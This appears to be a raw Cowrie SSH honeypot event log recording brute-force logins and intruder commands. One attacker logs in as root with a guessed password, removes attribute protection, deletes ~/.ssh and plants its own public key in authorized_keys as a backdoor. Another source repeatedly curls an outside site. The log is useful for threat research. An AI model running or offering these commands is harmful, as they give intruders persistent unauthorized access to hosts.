{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.119978Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.120754Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.157445Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.158360Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.197495Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.198436Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.connect","src_ip":"41.223.30.169","src_port":54488,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d9093db7c64","protocol":"ssh","message":"New connection: 41.223.30.169:54488 (1.2.3.4:22) [session: 2d9093db7c64]","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.212673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.213364Z","src_ip":"41.223.30.169","session":"2d9093db7c64"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.236394Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.237170Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.296860Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.297707Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.357221Z","src_ip":"41.223.30.169","session":"2d9093db7c64"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.395131Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.396025Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.447997Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.448873Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.486163Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.487005Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.523651Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.524446Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.560804Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.561727Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.643718Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.644575Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.681279Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.682131Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.720520Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.721695Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.759357Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.760188Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.796986Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.797747Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.835460Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.836563Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.879271Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.880141Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.922058Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.922992Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":36186,"dst_ip":"1.2.3.4","dst_port":22,"session":"20110760a278","protocol":"ssh","message":"New connection: 139.19.117.131:36186 (1.2.3.4:22) [session: 20110760a278]","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.956351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.957602Z","src_ip":"139.19.117.131","session":"20110760a278"}
{"eventid":"cowrie.login.success","username":"root","password":"qwert521","message":"login attempt [root/qwert521] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.973300Z","src_ip":"41.223.30.169","session":"2d9093db7c64"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.975874Z","src_ip":"139.19.117.131","session":"20110760a278"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:07.977764Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:07.978487Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"5f:3f:e2:f4:ee:06:ab:04:61:c1:d0:f4:38:74:37:3e","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFGn0M49hHG89K9pYrUoyI6Dci+6cusXLJWcdUGpS340","type":"ssh-ed25519","message":"public key attempt for user root of type ssh-ed25519 with fingerprint 5f:3f:e2:f4:ee:06:ab:04:61:c1:d0:f4:38:74:37:3e","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.012898Z","src_ip":"139.19.117.131","session":"20110760a278"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"5f:3f:e2:f4:ee:06:ab:04:61:c1:d0:f4:38:74:37:3e","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFGn0M49hHG89K9pYrUoyI6Dci+6cusXLJWcdUGpS340","type":"ssh-ed25519","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.013520Z","src_ip":"139.19.117.131","session":"20110760a278"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.036116Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.036875Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.091240Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.092090Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.133049Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.133872Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.281120Z","src_ip":"41.223.30.169","session":"2d9093db7c64"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.281929Z","src_ip":"41.223.30.169","session":"2d9093db7c64"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.283471Z","src_ip":"41.223.30.169","session":"2d9093db7c64"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.285947Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.286711Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.326145Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.326749Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.368170Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.369185Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.406595Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.407764Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.428926Z","src_ip":"41.223.30.169","session":"2d9093db7c64"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.445865Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.446792Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.490504Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.491467Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.528411Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.529260Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.566680Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.567557Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.604287Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.605630Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.642063Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.642963Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.682159Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.683157Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.721784Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.723034Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.783262Z","src_ip":"41.223.30.169","session":"2d9093db7c64"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.784157Z","src_ip":"41.223.30.169","session":"2d9093db7c64"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.787561Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.788379Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.825398Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.826296Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.863263Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.864572Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.910463Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.911476Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.930698Z","src_ip":"41.223.30.169","session":"2d9093db7c64"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.931580Z","src_ip":"41.223.30.169","session":"2d9093db7c64"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:08.987447Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:08.988511Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:09.050867Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
